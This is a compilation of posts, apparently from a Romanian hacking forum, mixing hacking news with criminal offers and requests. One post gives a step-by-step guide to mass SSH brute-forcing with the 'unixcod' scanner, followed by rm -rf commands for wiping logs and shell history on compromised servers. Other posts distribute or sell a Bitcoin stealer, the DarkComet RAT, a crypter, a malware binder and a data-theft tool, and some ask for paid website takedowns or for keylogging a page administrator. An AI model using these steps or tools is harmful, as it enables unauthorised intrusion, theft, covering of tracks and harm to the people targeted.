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  1. Salut! Este cineva in tema pe acest topic? Este unul destul de riscant asa ca nici nu stiu daca este ok, sa il discut aici. Sunt nou aici si nu stiu daca este sau nu o sectiunie setata doar pentru anumiti membri sau nu... Astept sa discutam despre acest subiect daca este cineva interesat. Va mulumesc si o zi faina la toata lumea....
  2. Toti cauta sa sparga rooturi sau alte servici de care pot profita in mediul online..Un exemplu de "munca" ar fi: De ce avem nevoie: -1- bucata scanner ssh -2- bucata brute force ssh -3- 2 in 1 .... Avem nevoie de scannerul: unixcod Descarcam scannerul:2shared - download unixcod.tar.gz PS : tool-ul folosit este unul destul de comod care se descurca destul de bine , dar totusi , daca vrei sa furi ceva bun ai nevoie de ceva pe masura. Deschidem consola.. Folosim comanda de extragere: sudo tar -zxvf <sursa fisier> Fisierul este extras..acum frumos selectam din consola calea catre folder: cd <sursa fisier> Acum ca sa pornim scannerul , in folderul sursa , dam comanda: ./unix ip.ip Unde ip sunt primele 2 rangeuri dintr-un ip , de exemplu din ip-ul luam doar 100.111. EXEMPLU: Start scan: user@user-desktop:~/unixcod$ ./unix 70.70 [+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+] [+] SSH Brute force scanner : user & password [+] [+] Undernet Channel : #UnixCoD [+] [+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+] [+] Scanam: 70.70.4.* (total: 2) (1.6% done) Scan finish: [+] Find ip a terminat in 530 de secunde. [Am gasit 66 ip`uri] [+] Incepe partea cea mai misto [+] Doar 66 de servere. Exista un inceput pt. toate ! [=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=] [+] Incepem sa vedem cate server putem sparge [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Scanner a terminat de scanat ! Cand acceseri un root/server web e bine sa iti stergi logurile , in masura permisiunilor furate: Avem comenzile urmatoare ______________________________________________ | | +LOG REMOVE SHELL COMAND+ | | |___|____________________________________|___| | + | rm -rf unixcod | + | | + | rm -rf /tmp/logs | + | | + | rm -rf $HISTFILE | + | | + | rm -rf /root/.ksh_history | + | | + | rm -rf /root/.bash_history | + | | + | rm -rf /root/.ksh_history | + | | + | rm -rf /root/.bash_logout | + | | + | rm -rf /usr/local/apache/logs | + | | + | rm -rf /usr/local/apache/log | + | | + | rm -rf /var/apache/logs | + | | + | rm -rf /var/apache/log | + | | + | rm -rf /var/run/utmp | + | | + | rm -rf /var/logs | + | | + | rm -rf /var/log | + | | + | rm -rf /var/adm | + | | + | rm -rf /etc/wtmp | + | | + | rm -rf /etc/utmp | + | | + | | + | | + |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| + | | + | | + | |_+_|____________________________________|_+_| Alte completari o sa aduc in masura intrebarilor postate.
  3. Salutare tuturor! Am gasit acum 2 saptamani in urma un BitcoinStealer. De frica sa nu fiu infectat cumva l-am testat intr-un virtula machine si chiar a functionat. Imi place ca poate functiona ca un stealer clasic, furand parolele la siteuri de exchange precum Coinbase, Bittrex, HitBTC etc, dar poate fi setat ca bitcoinii sa fie trimisi la o anumita adresa. Va las linkul de download mai jos pentru cei interesati. LINK: http://bit.ly/2BsAZ82 banned: (M2G) Descarcati doar ca si sample daca vreti sa-l analizati
  4. cine ma poate ajuta cu cateva scanere?
  5. DarkComet is a remote administration tools allows a user to control the system with a Graphical User Interface (GUI). It has many features which allows a user to access remote computer as an administrator. Download darkcomet 5.3.1 full version free of cost.Features:- Spy Functions.- Webcam and Sound Capture.- Remote Desktop.- Keylogger.- Network Functions like Active Ports. Network Shares. Server Socks5. LAN Computers. Net Gateway.- Computer Power options like Power off. Shutdown. Restart. Logoff.- Server Actions like Lock Computer. Restart Server. Close Server. Uninstall Server.Many other features… In short it’s a complete package of tools.Pass:tr // Removed
  6. [part 1]Some basic Linux commands Hello guys Today, we just started a new series on Linux commands. It's gonna be a fun Tutorial link:: so keep watching Pentesting with spirit Please Subscribe my channel to get the notification for the upcomming tutorials , and please like & share too :cool: Sharing is power :blackhat: and please comment if i have done anything wrong ----------------------------------------------------------------------------------------------------------- Subscribe our channel:: www.youtube.com/c/Pentestingwithspirit Like our facebook page:: www.facebook.com/Pentest.with.spirit1 Follow us on twitter:: @spirit3113
  7. 1.Codex - Require NET Framework 4 CODEX(password=emv).7z — RGhost — file sharing 2.Jeff conversor jeff conversor(password=emv).7z — RGhost — file sharing Check if you have all drivers installed (I recommend Windows 7 64 bits) For other tools PM me Good Luck !!!
  8. 50% DISCOUNT FOR THE FIRST 10 BUYERS youtube] SCAN RESULT Features * GUI and inbuilt stub are coded in C++ * No depentancies * Assembly change * FUD Attention!!!!! IF you bind infected files your binded file it will be infected too ! so be careful :blackhat: Contact me Skype: snippy.boy
  9. Easy Binder is one of the best softwares to bind your malware with a legit exe. It does support custom icons and a number of compression algorithms. Its one of the best binders out there. Its fast and easy to use. Download://malware Virustotal: https://www.virustotal.com/tr/file/3c67c77735390fa15900c9eff733862debea060439f61a8c021022db2a606f8f/analysis/1443846874/
  10. Ziua buna, Sunt convins ca o mare parte din utilizatorii de pe acest forum o sa-mi sariti in cap, atunci cand o sa cititi acest txt. Vreau sa fac acest lucru tocmai ca s-au incalcat tot ce inseamna protectia datelor si confidentialitatea persoanei. Este vorba de o publicatie online, care au un site de news bazat pe wp, pe mine m-ar interesa sa pot da jos 1 singura pagina unde se face referire la o anumita persoana, careia i s-au incalcat drepturile. Nu vreau sa creez polemici , ca trebuia sa ma duc la un avocat ca poate ar fii bine asa sau asa, am discutat cu cei abilitati in domeniu i-am si somat verbal prin telefon pe cei de la respectiva publicatie. "Stergeti numele si respectiva pagina ca o sa va dau pe mana autoritatilor- Si autoritatile mi-au dat pauza publicitara". Gandesc ca as iesii mai ieftin daca cineva ar reusii sa-mi dea jos 1 singura pagina de wp, si acest lucruu sa fie definitiv. Plata am sa o fac paypal, transfer bancar sau cash. As dorii sa primesc prin pm oferte de la cei interesati si care considera ca vor sau pot sa faca acest lucru, oricum o sa ies mai ieftin daca rezolv problema asa:) decat sa angajez un avocat.
  11. Hackers have managed to make a huge video billboard in Atlanta display an obscene image favoured by internet pranksters. It prompted calls to police, and soon after, the billboard's owner cut off its power supply. The hack came after a security researcher warned the company, which runs thousands of the video billboards, that they were vulnerable to attack. The FBI and Homeland Security are now investigating the hack. The attackers are believed to have been able to take over the billboard because it used an easy-to-guess password on its net-connected remote administration system. The billboard is owned by US electric-sign giant Yesco, which runs thousands of similar billboards across America. Other signs in other states are also believed to have had their images changed at the same time. Security expert Dan Tentler said in a tweet that he had warned Yesco about the potential for attack, but the company had told him that it was "not interested" in his information. Mr Tentler said it was easy to find hundreds of other signs on the internet that were vulnerable in the same way. Many of these signs were still online after the hack attack had taken place, he added. A group calling itself the Assange Shuffle Collective claimed responsibility for the attack, in a discussion on social news site Reddit. However, there has been no independent verification of the claim. Source
  12. https://cellhack.net/login/ So what exactly is CellHack? Put simply, you are the master of a colony of cells. Your colony will be placed in an arena with three other colonies, and all will compete to create the largest population. This is achieved by writing a function that will be executed by each of your cells every turn. The cells are not very complex: they have simple memories, and can look around, move, split, and attack their neighbors. From these building blocks, you must design an algorithm that will lead your colony to victory by any means necessary. Think of it as a cross between the simulation game Life and BattleBots, all done in C. We have provided some sample functions for you to test yourself against, and you can also test yourself against other functions you write. On May 12th, at 5pm Eastern, we will have a competition to see which functions reign supreme. The competition will be held live at Jailbreak Brewing in Laurel, MD and streamed via Twitch.tv. We hope to see you in person or online, and look forward to seeing how your solutions match up against each other (and maybe even a few of our own favorites).
  13. European airline Ryanair has admitted falling victim to a hacking attack that saw €4.6m of the company's money transferred to a bank account in China. Law enforcement agencies and financial organisations have already been alerted to the incident, according to reports, and Ryanair is confident that it will get the money back. "Ryanair confirms that it has investigated a fraudulent electronic transfer via a Chinese bank last week. The airline has been working with its banks and the relevant authorities and understands that the funds, less than $5m, have now been frozen," the company said. "The airline expects these funds to be repaid shortly, and has taken steps to ensure that this type of transfer cannot recur. As this matter is subject to legal proceedings, no further comment will be made." The relevant authority in Ryanair's home country of Ireland is the Criminal Assets Bureau, an independent body with powers similar to the local police. Like the UK Assets Recovery Agency, the Criminal Assets Bureau focuses on serious crimes and the ability to pursue assets from criminals and compensate victims. The airline industry benefits and suffers from its use of technology. American Airlines was forced to ground flights this week because of a software problem. British Airways fell victim to an apparent hack in March that affected its most frequent fliers. The company cleared out some of its user accounts and changed log-ins, but it was revealed that the hack was more of a probe on its systems enabled by a leak from another provider. "This appears to have been the result of a third party using information obtained elsewhere on the internet, via an automated process, to try to gain access to some accounts,” BA said in a statement at the time. The incidents underline the perils technology can pose to businesses and the importance of having adequete plans in place should things go wrong. Via
  14. // Removed hack pentru toate jocurile de pe facebook
  15. Cel mai nou cod tip wall pentru CS 1.6 Merge pe steam fara probleme , nu e detectat de VAC! Download FileShare Download Wall.Undetected.v02.rar Lasati reply daca merge
  16. Numele meu este Radu , lucrez la o firma de IT din Londra . Mi-am facut cont pe acest forum nu ca am ceva de invatat ....am auzit ca pe aici majoritatea sunt specializati in hack....ce-mi doresc ? Vreau sa provoc toti hackerii de pe acest forum ....si nu ma refer la balarii .....daca te crezi amator stai in banca ta ...Astept raspunsuri !
  17. Its the succsessor to havij. Its better faster and more secure. Its the best tool i could find. Licence key is included in rar. You can steal data from servers with this tool Download: https://mega.co.nz/#!Ek90QSyI!p6zSz0tIhD2cfj889AAzrOI8HAnTl61QsAAOw8-pQNI
  18. Salutare voi sari peste partea introductiva pentru ca a mai fost explicata odata aici. https://rstforums.com/forum/84023-tutorial-jocuri-steam-origin-desura-gratuite.rst Cu totii stiti ca momentan Romania nu are dreptul sa joace jocuri pe acest site,dar nu va panicati. Hai sa incepem!!! Pas 1. Descarcati SoftEther VPN Client => Download VPN Gate Client Pas 2. Intra in arhiva,in setup... si cred ca stiti sa dai next,next,next .... finish nu? Pas 3. Porniti SoftEther VPN Client si dati dublu click pe VPN Gate public VPN... Pas 4. O sa va apara o lista cu multe vpn-uri,acum ce trebuie voi sa faceti? Simplu, va uitati in acele liste si cautati un VPN din coreea cu un line speed de peste 50 (ca sa aveti viteza). Apoi dati Connect to the VPN A-ti facut cam 90% din acest tutorial,m-ai aveti un sigur lucru de facut...UN CONT NOU Va inregistrati aici : http://www.tremorgames.com/?ref=559929 cu referal daca credeti ca v-am fost de folos) sau aici : http://www.tremorgames.com ( fara referal) ATENTIE!!!! Acest tutorial este facut pentru incepatori,nu vreau sa aud comentarii gen:"tutorial de rahat" sau cine stie ce alte minunatii Daca vreti sa ma adaugati la prieteni: numele meu este GyeBaek
  19. Un hack foarte bune pentru cs Poti sa ii setezi tinata sa dea la cap la piept sau ori ce parte a corpului Sper sa va fie de folos Download: Zippyshare.com
  20. Buna tuturor stiu foarte bine ca sunteti niste baieti de treaba care fac fata oricarei probleme ..va rog foarte frumos ajutatima si pe mine cu asa o problema..Eu am internet de la moldtelecom ..am si wifi in casa,,,am pe notebook am kali linux .Vreau sa ma invat sa aflu parola de la router(routerul propriu) nu va ginditi nu sunt un raufacator pur si simplu pentru mine wifi este ceva foarte si foarte captivant vreau sa stiu sa il spart numai din motivul ca vreau sa stiu .Eu am folosit metoda reaver totul a mers bine am primit parola asa cum este..in setarile routerului am oprit wps...si reaver nu mai merge ...am capturat un hadshake si aici mam orpit mai departe ce pot face cu acesta ...sa sparg cu dictionarul nu imi comvine din motivul ca am descarcat unul de 10milione lam deschis si parola de la routerul meu nici nu era acolo... ce metode imi recomandati .. este ceva mai simplu ceva mai repede..? va multumesc anticipat
  21. Salut RST, vreau sa aflu cine este in spatele unei pagini de facebook de genul Curve din ..... sau Cocalari din (oras) . Vreau sa aflu asta prin orice metoda, orice, am incercat sa fac ceva si am aflat doar un IP. Am inteles ca sunt mai multi Administratori, dar vreau macar sa aflu unul. Cum pot face asta? ceva de genul sa trimit o poza care sa aiba un keylogger, sau social engineering sau altceva. Va rog ajutati-ma cu asta, va voi ramane recunoscator. Multumesc PS. Cel mai bun prieten al meu a fost pus pe o pagina ca asta, vor sa se razbune pe el nu stiu din ce motiv si au ales metoda asta. Vreau sa aflu cine a facut asta si sa fie inchisa pagina respectiva.
  22. A Hacker Is Remotely Locking iPhones, iPads and Macs, Wants Ransom to Unlock Them What would your first thoughts be if you turned on your iPhone today and saw this message awaiting you: "Device hacked by Oleg Pliss"? Then, Oleg Pliss tells you that the only way to unlock your phone is to send him $50 through PayPal. Day ruined, amirite? Well, many people in Australia woke up to that and similar messages this morning after hackers used the Find My Device feature on iPhones, iPads and Macs to lock down the device and send the messages. Word started to spread as people went to Apple support forums and reported their problem. While some users have been able to gain back access to their devices without giving the hacker their lunch money for the week, others are waiting for Apple to find a solution. It isn't clear how the hackers were able to pull this off, but it's thought that they may be using leaked email addresses and passwords from somewhere, and are attacking the people who use the same email and password for their AppleID. While this hasn't affected anyone in the States yet, this is a good reminder to change your passwords if you use the same one for more than one website. Sursa: A Hacker Is Remotely Locking iPhones, iPads and Macs, Asks for Ransom to Unlock Them | Complex Via: Apple iPhones, iPads, Macs Hacked and Held For Ransom - TIME
  23. Este un blog personal unde voi posta diferite hack-uri/mod-uri pentru jocurile Android dar si programe full/pro din Google Play. DarkPanda Blog - Tot ce-mi trece prin cap! Daca aveti nevoie de hack pentru o anumita aplicatie aveti detalii despre cum puteti cere.
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